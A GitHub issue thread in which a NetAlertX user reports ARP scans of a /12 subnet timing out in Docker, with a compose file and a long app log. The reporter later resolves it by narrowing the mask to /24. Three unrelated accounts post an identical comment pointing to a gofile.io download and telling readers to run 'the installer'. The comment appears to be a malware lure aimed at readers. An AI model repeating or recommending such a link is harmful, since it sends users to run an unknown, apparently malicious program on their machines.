### ISSUE TITLE
ARP not working in docker

### ISSUE THREAD

**Issue by hkrawczyk** [jokob-sk/NetAlertX#787]
### Is there an existing issue for this?

- [X] I have searched the existing open and closed issues and I checked the docs https://github.com/jokob-sk/NetAlertX/tree/main/docs

### Current Behavior

During scan `10.0.0.0/12 --interface=eth0` no device is found

### Expected Behavior

Find all connected devices. 

When i connect to the docker container I'm able to successfully scan using `sudo arp-scan --interface=eth0 10.0.0.0/12`

### Steps To Reproduce

1. Install in Docker
2. Set `10.0.0.0/12 --interface=eth0` in SCAN_SUBNETS

### app.conf

```python
-
```

### docker-compose.yml

```python
version: "3"
services:
  netalertx:
    container_name: NetAlertX
    hostname: NetAlertX
    privileged: true
    image: jokobsk/netalertx:latest
    environment:
      - TZ=Europe/Warsaw  # Updated timezone to Europe/Warsaw
    restart: always
    volumes:
      - ./netalertx/db:/app/db
      - ./netalertx/config:/app/config
    network_mode: host
```

### What branch are you running?

Production

### app.log

15:04:09 [Config] ⛔ Unloading NMAP
15:04:09 [Config] ⛔ Unloading NMAPDEV
15:04:09 [Config] ⛔ Unloading NBTSCAN
15:04:09 [Config] ⛔ Unloading DHCPSRVS
15:04:09 [Config] ⛔ Unloading DHCPLSS
15:04:09 [Config] ⛔ Unloading PIHOLE
15:04:09 [Config] ⛔ Unloading UNFIMP
15:04:09 [Config] ⛔ Unloading SNMPDSC
15:04:09 [Config] ⛔ Unloading OMDSDN
15:04:09 [Config] Number of Plugins to load: 15
15:04:09 [Config] Plugins to load: ['ARPSCAN', 'INTRNT', 'NSLOOKUP', 'SMTP', 'CSVBCKP', 'DBCLNP', 'MAINT', 'NEWDEV', 'NTFPRCS', 'PHOLUS', 'SETPWD', 'SYNC', 'UI', 'VNDRPDT', 'WORKFLOWS']
15:04:09 [API] Updating table_settings.json file in /front/api
15:04:09 [Config] Imported new config
15:04:09 [API] Updating table_plugins_language_strings.json file in /front/api
15:04:09 [Plugin utils] ---------------------------------------------
15:04:09 [Plugin utils] display_name: NSLOOKUP (Name discovery)
15:04:09 [Plugins] Executing: python3 /app/front/plugins/nslookup_scan/nslookup.py
15:04:09 [NSLOOKUP] In script
15:04:09 [Database] Opening DB
15:04:09 [NSLOOKUP] Unknown devices count: 0
15:04:09 [NSLOOKUP] Script finished
15:04:09 [Plugins] No output received from the plugin NSLOOKUP - enable LOG_LEVEL=debug and check logs
15:04:09 [Notification] Check if something to report
15:04:09 [Notification] Included sections: ['new_devices', 'down_devices', 'events']
15:04:09 [Notification] No changes to report
15:04:09 [MAIN] Process: Wait
15:05:10 [Plugin utils] ---------------------------------------------
15:05:10 [Plugin utils] display_name: Arp-Scan (Network scan)
15:05:10 [Plugins] Executing: python3 /app/front/plugins/arp_scan/script.py userSubnets={subnets}
15:05:10 [ARP Scan] In script 
15:05:10 [ARP Scan] userSubnetsParam: 10.0.0.0/12 --interface=eth0
15:05:10 [Database] Opening DB
15:10:10 [Plugins] ⚠ ERROR - TIMEOUT - the plugin ARPSCAN forcefully terminated as timeout reached. Increase TIMEOUT setting and scan interval.
15:10:10 [Plugins] No output received from the plugin ARPSCAN - enable LOG_LEVEL=debug and check logs
15:10:10 [Plugin utils] ---------------------------------------------
15:10:10 [Plugin utils] display_name: Internet-Check
15:10:10 [Plugins] Executing: python3 /app/front/plugins/internet_ip/script.py prev_ip={prev_ip} INTRNT_DIG_GET_IP_ARG={INTRNT_DIG_GET_IP_ARG}
15:10:10 [INTRNT] In script
15:10:10 [INTRNT] INTRNT_DIG_GET_IP_ARG: -4 myip.opendns.com @resolver1.opendns.com
15:10:10 [INTRNT] - Retrieving Internet IP
15:10:10 [INTRNT]  DIG result : 5.173.144.99

15:10:10 [INTRNT]  Current internet_IP : 5.173.144.99
15:10:10 [INTRNT]          previous_IP : 0.0.0.0
15:10:10 [INTRNT] Finished 
15:10:10 [Plugins] SUCCESS, received 1 entries
15:10:10 [API] Updating table_appevents.json file in /front/api
15:10:10 [API] Updating table_plugins_events.json file in /front/api
15:10:10 [API] Updating table_plugins_history.json file in /front/api
15:10:10 [API] Updating table_plugins_objects.json file in /front/api
15:10:10 [Process Scan]  Processing scan results
15:10:10 [Process Scan] Print Stats
15:10:10 [Scan Stats] Devices Detected.......: 2
15:10:10 [Scan Stats] New Devices............: 1
15:10:10 [Scan Stats] Down Alerts............: 0
15:10:10 [Scan Stats] New Down Alerts........: 0
15:10:10 [Scan Stats] New Connections........: 0
15:10:10 [Scan Stats] Disconnections.........: 0
15:10:10 [Scan Stats] IP Changes.............: 1
15:10:10 [Scan Stats] Scan Method Statistics:
15:10:10     INTRNT: 1
15:10:10     local_MAC: 1
15:10:10 [Process Scan] Stats end
15:10:10 [Process Scan] Sessions Events (connect / discconnect)
15:10:10 [Process Scan] Creating new devices
15:10:11 [Process Scan] Updating Devices Info
15:10:11 [Process Scan] Voiding false (ghost) disconnections
15:10:11 [Process Scan] Pairing session events (connection / disconnection) 
15:10:11 [Process Scan] Creating sessions snapshot
15:10:11 [Process Scan] Inserting scan results into Online_History
15:10:11 [Process Scan] Skipping repeated notifications
15:10:11 [Skip Repeated Notifications] Skip Repeated
15:10:11 [Plugin utils] ---------------------------------------------
15:10:11 [Plugin utils] display_name: NSLOOKUP (Name discovery)
15:10:11 [Plugins] Executing: python3 /app/front/plugins/nslookup_scan/nslookup.py
15:10:11 [NSLOOKUP] In script
15:10:11 [Database] Opening DB
15:10:11 [NSLOOKUP] Unknown devices count: 1
15:10:11 [NSLOOKUP] Domain Name: NetAlert.universe.
15:10:11 [NSLOOKUP] Script finished
15:10:11 [Plugins] SUCCESS, received 1 entries
15:10:11 [API] Updating table_appevents.json file in /front/api
15:10:11 [API] Updating table_plugins_history.json file in /front/api
15:10:11 [API] Updating table_plugins_objects.json file in /front/api
15:10:11 [Update Device Name] Trying to resolve devices without name. Unknown devices count: 1
15:10:11 [Update Device Name] Pholus entries from prev scans: 0
15:10:11 [Update Device Name] Names Found (DiG/NSLOOKUP/NBTSCAN/Pholus): 1 (1/0/0/0)
15:10:11 [Update Device Name] Names Not Found         : 0
15:10:11 [Plugin utils] ---------------------------------------------
15:10:11 [Plugin utils] display_name: Pholus (Name discovery)
15:10:11 [Plugins] Executing: python3 /app/front/plugins/pholus_scan/script.py userSubnets={subnets} timeoutSec={timeout}
15:10:11 [PHOLUS] In script
15:10:11 [PHOLUS] Subnets: ["userSubnets=b'MTAuMC4wLjAvMTIgLS1pbnRlcmZhY2U9ZXRoMA=='"]
15:10:11 [PHOLUS] len Subnets: 1
15:10:11 [PHOLUS] 'MTAuMC4wLjAvMTIgLS1pbnRlcmZhY2U9ZXRoMA=='
15:10:11 [PHOLUS] 300
15:10:11 [PHOLUS] userSubnetsParam 10.0.0.0/12 --interface=eth0 
15:10:11 [PHOLUS] 300.0 
15:10:11 [PHOLUS] Scan: Pholus for 300.0s (5.0min)
15:10:11 [PHOLUS] Pholus scan on [interface] eth0 [mask] 10.0.0.0/12

### Debug enabled

- [X] I have read and followed the steps in the wiki link above and provided the required debug logs and the log section covers the time when the issue occurs.

**Comment by blade2005** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by 0IHI0** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by hkrawczyk** [comment]
helped, resolved. I had to change mask from /12 to /24 and limit dhcp as ARP took around 20min to scan whole range

**Comment by jokob-sk** [comment]
Thanks for the update, closing as solved
